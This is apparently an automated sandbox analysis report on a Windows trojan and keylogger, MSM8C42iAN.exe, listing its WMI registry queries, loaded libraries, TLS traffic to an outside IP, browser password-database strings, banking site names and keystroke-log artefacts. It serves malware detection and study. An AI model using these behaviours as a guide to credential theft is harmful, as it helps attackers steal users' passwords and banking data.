Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49934 version: TLS 1.2

System Summary
barindex
PE file has a writeable .text section
Source: MSM8C42iAN.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Writes or reads registry keys via WMI
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\MSM8C42iAN.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
PE file contains executable resources (Code or Archives)
Source: MSM8C42iAN.exe Static PE information: Resource name: CUSTOM type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
Sample file is different than original file name gathered from version info
Source: MSM8C42iAN.exe Binary or memory string: OriginalFilenamesootiest.exe vs MSM8C42iAN.exe
Uses 32bit PE files
Source: MSM8C42iAN.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: MSM8C42iAN.exe Binary or memory string: D*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp4A@=
Source: classification engine Classification label: mal100.troj.spyw.winEXE@2/18@2/2
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Mutant created: NULL
Source: MSM8C42iAN.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: MSM8C42iAN.exe, 00000000.00000003.1403774208.00000000005C1000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1404088936.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1403654652.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, LogqueintiseRngmeEXkkcAcRDShRzsDXooICEfirelit.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: MSM8C42iAN.exe ReversingLabs: Detection: 65%
Source: unknown Process created: C:\Users\user\Desktop\MSM8C42iAN.exe "C:\Users\user\Desktop\MSM8C42iAN.exe"
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: msvbvm60.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: vb6zz.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Section loaded: esscli.dll Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EE09B103-97E0-11CF-978F-00A02463E06F}\InprocServer32 Jump to behavior
Source: Binary string: W.pdb4 source: MSM8C42iAN.exe
PE file contains an invalid checksum
Source: MSM8C42iAN.exe Static PE information: real checksum: 0x7e01c should be: 0x796ef
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\MSM8C42iAN.exe Window / User API: foregroundWindowGot 1776 Jump to behavior
Source: WebData.0.dr Binary or memory string: dev.azure.comVMware20,11696497155j
Source: WebData.0.dr Binary or memory string: global block list test formVMware20,11696497155
Source: WebData.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: WebData.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: MSM8C42iAN.exe, 00000000.00000003.1443978870.000000000061F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1442535526.000000000061F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000061F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1442580909.00000000005E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: WebData.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: MSM8C42iAN.exe, 00000000.00000003.1404206426.00000000005C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: x\ctivebrokers.co.inVMware20,11696497155d
Source: WebData.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
Source: WebData.0.dr Binary or memory string: tasks.office.comVMware20,11696497155o
Source: WebData.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: WebData.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: WebData.0.dr Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: WebData.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: WebData.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: WebData.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: WebData.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: WebData.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: WebData.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: WebData.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: WebData.0.dr Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: WebData.0.dr Binary or memory string: AMC password management pageVMware20,11696497155
Source: WebData.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: WebData.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: MSM8C42iAN.exe, 00000000.00000003.1404206426.00000000005C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696497155P}\
Source: WebData.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: WebData.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: WebData.0.dr Binary or memory string: discord.comVMware20,11696497155f
Source: MSM8C42iAN.exe, 00000000.00000003.1404206426.00000000005C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ctivebrokers.co.inVMware20,11696497155d
Source: WebData.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: WebData.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: WebData.0.dr Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: WebData.0.dr Binary or memory string: outlook.office.comVMware20,11696497155s
Source: WebData.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: WebData.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: WebData.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:25]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1404206426.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:03]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:25]<<Program Manager
Source: MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @%SystemRoot%\system32\dnsapi.dll,-10355:25]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.0000000000616000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5:46]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1442580909.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:19]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1404206426.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:08]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 7:55:24]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891223171.000000000060F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:47]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:42]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:31]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:36]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:20]<<Program Manager>>
Source: KeyDataovGFJnlG.txt.0.dr Binary or memory string: [07:56:34]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:30]<<Program Manager>>
Source: KeyDatansgiHqmX.txt.0.dr Binary or memory string: [07:56:56]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:41]<<Program Manager>>
Source: KeyDataDqJdpmHo.txt.0.dr Binary or memory string: [07:56:45]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.0000000000616000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: a5:46]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-1245:05]<<Program Manager>>
Source: KeyDataHhUnZmvD.txt.0.dr Binary or memory string: [07:56:23]<<Program Manager>>
Source: KeyDataZWdrgPWC.txt.0.dr Binary or memory string: [07:56:12]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:21]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1813034087.000000000346B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 07:55:24]<<Program Manager>>
Source: KeyDataOebbnOVW.txt.0.dr Binary or memory string: [07:56:00]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:35]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:43]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1442580909.00000000005A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Z]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:26]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:55:31]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1404206426.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:04]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1404206426.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:09]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:34]<<Program Manager>>
Source: KeyDataDqJdpmHo.txt.0.dr Binary or memory string: [07:56:52]<<Program Manager>>
Source: KeyDatansgiHqmX.txt.0.dr Binary or memory string: [07:57:06]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891223171.000000000060F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:48]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1442580909.00000000005CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerttureEM0
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 55:42]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ThunderRT6PictureBox:55:30]<<Program Manager>>
Source: KeyDataDqJdpmHo.txt.0.dr Binary or memory string: [07:56:44]<<Program Manager>>
Source: KeyDataHhUnZmvD.txt.0.dr Binary or memory string: [07:56:22]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 07:55:06]<<Program Manager>>
